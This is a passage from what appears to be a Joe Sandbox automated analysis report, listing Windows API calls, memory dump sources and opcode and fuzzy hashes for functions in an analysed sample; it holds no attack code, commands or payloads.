                                                                • Instruction Fuzzy Hash: B951AE7A7183019BD7608E06D980B2B73D5EB98314F64482FE946CB351D33EDD468B5B
                                                                APIs
                                                                • SafeArrayAllocDescriptor.OLEAUT32(00000001,?), ref: 0042AAB5
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 0042AADD
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0042AAF1
                                                                • SafeArrayDestroy.OLEAUT32(?), ref: 0042AB00
                                                                • SysAllocString.OLEAUT32(00000000), ref: 0042AB33
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0042ABA5
                                                                • VariantClear.OLEAUT32(?), ref: 0042ABB0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$AllocData$AccessClearDescriptorDestroyStringUnaccessVariant
                                                                • String ID:
                                                                • API String ID: 959405800-0
                                                                • Opcode ID: a49a1d726510079caa05acaf699350e751fd496200b3ee7d4788bad4ade4fac2
                                                                • Instruction ID: e78877611a345a0c5f73117d671949b20e4f1872f582fe53a19fe75ebe15ad10
                                                                • Opcode Fuzzy Hash: a49a1d726510079caa05acaf699350e751fd496200b3ee7d4788bad4ade4fac2
                                                                • Instruction Fuzzy Hash: 9351F272B082218BE710CE14E98071B77E1AF84324F69486FEE4997311D23DEC56CB9B
                                                                APIs
                                                                • GetStartupInfoA.KERNEL32 ref: 004CECB2
                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,?,?), ref: 004CED31
                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004CED4A
                                                                • CloseHandle.KERNEL32(?), ref: 004CED5B
                                                                • CloseHandle.KERNEL32(?), ref: 004CED62
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreateInfoObjectProcessSingleStartupWait
                                                                • String ID: D
                                                                • API String ID: 2246201701-2746444292
                                                                • Opcode ID: fe1a3573c42138bac607bd3eb089348872ec80b81e4302a9449e6ed191fffd85
                                                                • Instruction ID: cc9a0b81f8c0b867509816d9d375112040518371b90dc173ad09a6dce363b280
                                                                • Opcode Fuzzy Hash: fe1a3573c42138bac607bd3eb089348872ec80b81e4302a9449e6ed191fffd85
                                                                • Instruction Fuzzy Hash: FB212C791083429AC2609F1AD888E5BFBF8EFC5750F20491EF59687260D77A8845CB5B
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                • String ID:
                                                                • API String ID: 1054593271-0
                                                                • Opcode ID: 60c5b3fca5f5bac3aae129150b2fdfc5d3be58b8f59e10879edba38688657a32
                                                                • Instruction ID: 1edbefccd68bde30e960696bd3cabf138c108c42805edc2f0a8df0bd02c60973
                                                                • Opcode Fuzzy Hash: 60c5b3fca5f5bac3aae129150b2fdfc5d3be58b8f59e10879edba38688657a32
                                                                • Instruction Fuzzy Hash: 0CF0F6329086235EEA34B7743C0AA4E3EA5FFC1770B248919F15DD44D6FF10884175A6
                                                                APIs
                                                                • GetVersionExA.KERNEL32 ref: 004DE36E
                                                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004DE3A3
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004DE403
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnvironmentFileModuleNameVariableVersion
                                                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                • API String ID: 1385375860-4131005785
                                                                • Opcode ID: cc94ea33216fdd3aff6ac6d955d1faaf8f57de1e112c2f7230c6063767097712
                                                                • Instruction ID: cef5c9b14e2de636c60a8ae8c030bf57d95cc0fe6db48a2401f7106ef9ecde00
                                                                • Opcode Fuzzy Hash: cc94ea33216fdd3aff6ac6d955d1faaf8f57de1e112c2f7230c6063767097712
                                                                • Instruction Fuzzy Hash: 62312871D412986DEB31A673ACA5AEE3B689B07304F1400EBD544DE342E63C9E858B1A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5dc778c64f6de0db0be82290c6c299521fe3b1aedc022d2e920f3016c560bdf0
                                                                • Instruction ID: c1668ba74bdc07974cf5b4c00d4d5ab858563be957b33d1c781798d26120dbf4
                                                                • Opcode Fuzzy Hash: 5dc778c64f6de0db0be82290c6c299521fe3b1aedc022d2e920f3016c560bdf0
                                                                • Instruction Fuzzy Hash: EF913771D01614ABCF21EF69CE61A9FBB79EB25360F240217F814B6390D7B99D408B6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6f96b4867547eb495983309ee8bc42e1c7503212f6f367234a3b45f0263f92a
                                                                • Instruction ID: 0e086c023c6ce614a2e90a42fa5feeb076bdd450aedcd419c883f8f51f948de3
                                                                • Opcode Fuzzy Hash: f6f96b4867547eb495983309ee8bc42e1c7503212f6f367234a3b45f0263f92a
                                                                • Instruction Fuzzy Hash: 65910AB1D00119AACF21AB69DDD5A9F7B79EB04760F200127F818B6391D7399D40C7AC
                                                                APIs
                                                                • GetStartupInfoA.KERNEL32(?), ref: 004DE0F6
                                                                • GetFileType.KERNEL32(?,?,00000000), ref: 004DE1A1
                                                                • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004DE204
                                                                • GetFileType.KERNEL32(00000000,?,00000000), ref: 004DE212
                                                                • SetHandleCount.KERNEL32 ref: 004DE249
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileHandleType$CountInfoStartup
                                                                • String ID:
                                                                • API String ID: 1710529072-0
                                                                • Opcode ID: 8be64a4e14b26ab6f5cc16c6261ed22f21b150ba6e1a81cb6c7991c01e031e85
                                                                • Instruction ID: 80e3a03d2af8ed9a5d13cc1b7fe0f18f2e6d06260f53e93f4570b596bf54836f
                                                                • Opcode Fuzzy Hash: 8be64a4e14b26ab6f5cc16c6261ed22f21b150ba6e1a81cb6c7991c01e031e85
                                                                • Instruction Fuzzy Hash: 425146716042019BD720EB6AC8A462A77E5BB02328F24476FD492CF3E1DB38D846C74A
APIs
• __ftol.LIBCMT ref: 0042E35A
• __ftol.LIBCMT ref: 0042E372
• RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,00000000,?,?,?,?,000006A4,?,00000000), ref: 0042E42A
• RegSetValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004,?,?,?,?,000006A4,?,00000000,80000004,00000000,00000000), ref: 0042E443
• RegCloseKey.ADVAPI32(?,?,?,?,?,000006A4,?,00000000,80000004,00000000,00000000,80000004), ref: 0042E45A
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: __ftol$CloseCreateValue
• String ID:
• API String ID: 2774032030-0
• Opcode ID: 87cef7bdf47f57844543b11e1872aa1cd693e77235bc976354781164402979ae
• Instruction ID: 023e2582569022385e886f6fbaf22cce4985febc8027c66a114747ce3ab55f10
• Opcode Fuzzy Hash: 87cef7bdf47f57844543b11e1872aa1cd693e77235bc976354781164402979ae
• Instruction Fuzzy Hash: 5541F1706083119BE320DE26D884B2FBBE4EB88314F64891EFE8987351D67DDC44CB5A
APIs
• RtlAllocateHeap.NTDLL(00000000,00002020,00692A84), ref: 004D4A17
• VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?), ref: 004D4A3B
• VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?), ref: 004D4A55
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?,?), ref: 004D4B16
• HeapFree.KERNEL32(00000000,00000000,?,?,004D4EC2,?,00000010,?,00000009,00000009,?,004D1A5C,00000010,?,?,?), ref: 004D4B2D
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFreeHeap$Allocate
• String ID:
• API String ID: 3000792370-0
• Opcode ID: fdcd8e763578ab4e9278f0eb4f736382df18b48c16c83bebfdb83decbc657f7d
• Instruction ID: e534bc740f4057d285d30c8cea4ccff9950536162273f407702a0596159ba493
• Opcode Fuzzy Hash: fdcd8e763578ab4e9278f0eb4f736382df18b48c16c83bebfdb83decbc657f7d
• Instruction Fuzzy Hash: 4D31FE72640743AFD7308F24DC94B22BBA9EB94764F10453BE1559BBA0E778A8449B4C
APIs
• PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0042C33A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042C364
• TranslateMessage.USER32(?), ref: 0042C36B
• DispatchMessageA.USER32(?), ref: 0042C372
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042C381
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: 0dcd50b2512ad1a183fead95d241eb94f51a31e238268db8a767ce7fe212b49f
• Instruction ID: d9ab7b62dd65e864912b5ec78e33b241f16a149a380d57bf7563b4d3650381fd
• Opcode Fuzzy Hash: 0dcd50b2512ad1a183fead95d241eb94f51a31e238268db8a767ce7fe212b49f
• Instruction Fuzzy Hash: D401A47278434576E230DB64AC82F6B775CEB84B50F944969FB00AA1C1D674F908C7AE
APIs
• PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004CC48A
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004CC4B4
• TranslateMessage.USER32(?), ref: 004CC4BB
• DispatchMessageA.USER32(?), ref: 004CC4C2
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004CC4D1
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: Message$Peek$DispatchTranslate
• String ID:
• API String ID: 1795658109-0
• Opcode ID: ae7f03681cd0f7dda4661774ca8815e32225d293ff1f0faf84106d4128c82ee8
• Instruction ID: 9eca8df32d057c037c574407abdcba98e5b0a17b00d10722842044dcfec41593
• Opcode Fuzzy Hash: ae7f03681cd0f7dda4661774ca8815e32225d293ff1f0faf84106d4128c82ee8
• Instruction Fuzzy Hash: D101A476284345BAE230EB54AC82F7777ACAB84B50F54486DF700AA1C1D674F908CB7D
APIs
• GetLastError.KERNEL32(0042DE27,0000FFFF,004E3A45,004E206C,004E1AE3,00000000), ref: 004DE2BD
• TlsGetValue.KERNEL32 ref: 004DE2CB
• SetLastError.KERNEL32(00000000), ref: 004DE317
  • Part of subcall function 004E443B: RtlAllocateHeap.NTDLL(00000008,004DE2E0,00000000), ref: 004E4531
• TlsSetValue.KERNEL32(00000000), ref: 004DE2EF
• GetCurrentThreadId.KERNEL32 ref: 004DE300
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ErrorLastValue$AllocateCurrentHeapThread
• String ID:
• API String ID: 2047054392-0
• Opcode ID: e0f20cdabe12b267afee74fe0408e98074a78e88814ff2f36ad17055a26931b7
• Instruction ID: 9cfceb27de6fa578779b947294b76644bd7ff713ca9351039eb84c9266a3141e
• Opcode Fuzzy Hash: e0f20cdabe12b267afee74fe0408e98074a78e88814ff2f36ad17055a26931b7
• Instruction Fuzzy Hash: 08F0BB316057519BD7313FB2BC5D62B7A55AF427B1710062FF9419E3E1CB798C028758
Strings
Memory Dump Source
• Source File: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: caff0c0b2992d962131ef94fc7d89afbd958209b3a5473da6f326e9259f9c048
• Instruction ID: ca5e2d21c7df75ad1bf28fecf05506ad1f39754e4b284112e42f6da0ceb8defa
• Opcode Fuzzy Hash: caff0c0b2992d962131ef94fc7d89afbd958209b3a5473da6f326e9259f9c048
• Instruction Fuzzy Hash: 5D516B31A082554BEF358A3898513FEFFA1BF96308F1855DDCCCA5B2C2DA625D82C780
APIs
• GetProcessHeap.KERNEL32(004CA418,00000001,?,80000301,00000000), ref: 004CA199
• RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 004CA1AD
• MessageBoxA.USER32(00000000,00692564,error,00000010), ref: 004CA1C6
Strings
Memory Dump Source
